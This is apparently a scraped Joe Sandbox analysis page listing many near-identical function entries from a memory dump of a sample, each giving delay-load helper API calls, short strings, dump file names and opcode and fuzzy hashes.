Function 0037E23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: bf60f462b81f46c417913718b1e64d7fc7f897ca1a09fd3956d020b6b7a08772
Instruction ID: 8d4d1463e9f7f06351a67ed05e6c72ceb2a1c901d4c2a13da5d6de9051315496
Opcode Fuzzy Hash: bf60f462b81f46c417913718b1e64d7fc7f897ca1a09fd3956d020b6b7a08772
Instruction Fuzzy Hash: 1EB012E5268000BC3217E1475C03E77010CC1C9F10330C07EF82DC5480D8446D000532

Function 0037E228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: 4aa36f6336a719b3a3703c2c0cb7a668db7ea8d419656b254f7b9fbe7164cf1a
Instruction ID: 14dab3c13cc615f3de776d6957ec526657e0510d8a74005405ec1e48f8b45272
Opcode Fuzzy Hash: 4aa36f6336a719b3a3703c2c0cb7a668db7ea8d419656b254f7b9fbe7164cf1a
Instruction Fuzzy Hash: 49B012E5268100BC3257E1465C03E37010CC1C9F10330C17EF82DC5480D8446D400532

Function 0037E21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: ce305c7b769c6e9e1b025e19aaecca43697a2039478ff71ec0604aab953ff941
Instruction ID: fd1595737e3422cc01d45708be95563ebd62b922b26bf2213e7e248fd6b2ffa9
Opcode Fuzzy Hash: ce305c7b769c6e9e1b025e19aaecca43697a2039478ff71ec0604aab953ff941
Instruction Fuzzy Hash: 67B012E6268000BC3217F1465C03E37010CC1CAF10330C07EFC2DC5480D844AD000532

Function 0037E200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: 1f9bbc204fec9aac4e3fdf90d70473bd99d489379b0f616cf198173fab41257c
Instruction ID: 50e6aba53d22dd0b01554b9d5c7cface5568bb1468395fcfc6c1be57f9631c2d
Opcode Fuzzy Hash: 1f9bbc204fec9aac4e3fdf90d70473bd99d489379b0f616cf198173fab41257c
Instruction Fuzzy Hash: 94B012D5368140BC3257F2465C03E37010CC5C9F10330C17EF82DC5680D8446C440532

Function 0037E20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD, 0037E20A

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: 78a675b3c98079984f147e7dce60b784472362251170cd700b3897f5d2695ed8
Instruction ID: 729be0c4b45bb967abb4285b6f2bd892adfbcd5385d875275535c6214e147c80
Opcode Fuzzy Hash: 78a675b3c98079984f147e7dce60b784472362251170cd700b3897f5d2695ed8
Instruction Fuzzy Hash: 6FB012D5268000BC3217F2475D03E37010CC5C9F10330C07EF82DC5680DC546D091532

Function 0037E264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: 75b4fed2e48bee113457d49ec170f7f5e9ef28583504378d1daff7044fe402da
Instruction ID: 0a1ce1d32086557acd7eed67ba5063f8ea987c1da0db4754358771d95a699cfd
Opcode Fuzzy Hash: 75b4fed2e48bee113457d49ec170f7f5e9ef28583504378d1daff7044fe402da
Instruction Fuzzy Hash: 5FB012D5279040BC3257E1465C03E77014DC5C9F10330C07EF82EC5480D8446C000533

Function 0037E26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: d6d02967e6eb71a7413b09ca4afcd1964b17c8d5f9e985ecdc3db1179dc123ca
Instruction ID: c9e3931fb23212cd6a1a342254aaef2ba676c69c84a07d8ff50d01ef5d0b1f61
Opcode Fuzzy Hash: d6d02967e6eb71a7413b09ca4afcd1964b17c8d5f9e985ecdc3db1179dc123ca
Instruction Fuzzy Hash: 4BB012D526C000BC3217F1565C03E37014CC1CAF10330C07EFC2DC5480D844BC000532

Function 0037E250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: 062c1b464e2810e93dcc89c964ef038c34426b42ac1ebb538df4e811aa902945
Instruction ID: 92591b497afb6c5565819e7c216c8c52771729846ff636931420a11e5fbee9a0
Opcode Fuzzy Hash: 062c1b464e2810e93dcc89c964ef038c34426b42ac1ebb538df4e811aa902945
Instruction Fuzzy Hash: F3B012E5269140BC3297E2465C03E37010DC1C9F10330C17EF82DC5480D844AC440533

Function 0037E246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: c6c088ff32ede8907ba66ed28d8ecd3eca8588101a2a7481f1ad377efecd1da0
Instruction ID: 21b2a0da6d51687e14cb9c72cafa5c87fe3b7cc77a2496a1bef1ba32458981de
Opcode Fuzzy Hash: c6c088ff32ede8907ba66ed28d8ecd3eca8588101a2a7481f1ad377efecd1da0
Instruction Fuzzy Hash: 31B012D52A9040BC3257F1465C03E37010DC1CAF10330C07EFC2DC5480D844AC000533

Function 0037E282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: ba13e72eb60c1296a50e24776d8fdf0c28ac2dbe2825e621d445672ebabc143d
Instruction ID: dca9b036d019c552d3473f171b235b1a8200589e6dc13a75fbb1e6e4b21cfc02
Opcode Fuzzy Hash: ba13e72eb60c1296a50e24776d8fdf0c28ac2dbe2825e621d445672ebabc143d
Instruction Fuzzy Hash: AEB012E526C000BC3217E1475D03E37018CC1C9F10330C07EF82DC5480DC457D010532

Function 0037EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037EAF9

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

3Ro, xrefs: 0037EAE7, 0037EAF3

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3Ro
API String ID: 1269201914-1492261280
Opcode ID: cff87c8c806430b89156c30997438238dad289a942f3605998dee7144ee14c86
Instruction ID: d20517389d2483cf541ab1fa457bded80f95770ebb165bb7952ab63c46f24f42
Opcode Fuzzy Hash: cff87c8c806430b89156c30997438238dad289a942f3605998dee7144ee14c86
Instruction Fuzzy Hash: E8B012CB2EA052BC365762001D02D37021CD4C4F90330D06EF529C8481DC844C010433

Function 0037E50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E51F

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

PDu<7, xrefs: 0037E519

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDu<7
API String ID: 1269201914-3110419215
Opcode ID: 18e9087f091198a78ace68aaab65cf666a6e6d0ee143b51f495a754a03e93059
Instruction ID: ad319b83592a46177ea284a561477528627fca81665ef4371567f9fe5464d716
Opcode Fuzzy Hash: 18e9087f091198a78ace68aaab65cf666a6e6d0ee143b51f495a754a03e93059
Instruction Fuzzy Hash: 10B012CA2681007C321721241D06E7B021CC0C6F20330D07EF439C4881A8454D040432

Function 0037E546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E51F

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

PDu<7, xrefs: 0037E519, 0037E546

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDu<7
API String ID: 1269201914-3110419215
Opcode ID: 9b92a09197f11ad023a14b60e2c3e3042242b0e8900af7e10f4ecf42550c5806
Instruction ID: d8ae37180091c1e88ade8030b08fb163bd9af1908f9089842cdfa3db4bc4b49a
Opcode Fuzzy Hash: 9b92a09197f11ad023a14b60e2c3e3042242b0e8900af7e10f4ecf42550c5806
Instruction Fuzzy Hash: 71B012CA2681007C331761085D03E3B021CC0CBF20330D26EF42DC4480E8444C440532

Function 0037E5B1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E580

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

Fjun7, xrefs: 0037E57A

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: Fjun7
API String ID: 1269201914-1894352427
Opcode ID: 21ecaaf338a3d945777b6fdaebc93a7d4ac84789cb097cc3508a5ea10628af69
Instruction ID: 7c0ecd5c2690befd2e96460f9c33edae51010224d88e13f1baf1f42e004a1fdf
Opcode Fuzzy Hash: 21ecaaf338a3d945777b6fdaebc93a7d4ac84789cb097cc3508a5ea10628af69
Instruction Fuzzy Hash: 4DB012C52681007C325761545C03E37012CC0CAF20338D26EF42CC9480E8444C401532

Function 0037E5A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E580

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

Fjun7, xrefs: 0037E57A

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: Fjun7
API String ID: 1269201914-1894352427
Opcode ID: 94e0cc7fedcfdc3599c0bc6ea0e966ccfd6e0146ececde5487bc168890dc14f9
Instruction ID: 170a4395ab6eded5c37d4085bcb10247242064b2b24bc4a1bd960c5860f675fc
Opcode Fuzzy Hash: 94e0cc7fedcfdc3599c0bc6ea0e966ccfd6e0146ececde5487bc168890dc14f9
Instruction Fuzzy Hash: 39B012C52680007C321761555D02E37012CC0CAF20338D26EF42CC9480EC444D011532

Function 0037E593 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E580

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

Fjun7, xrefs: 0037E57A, 0037E593

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
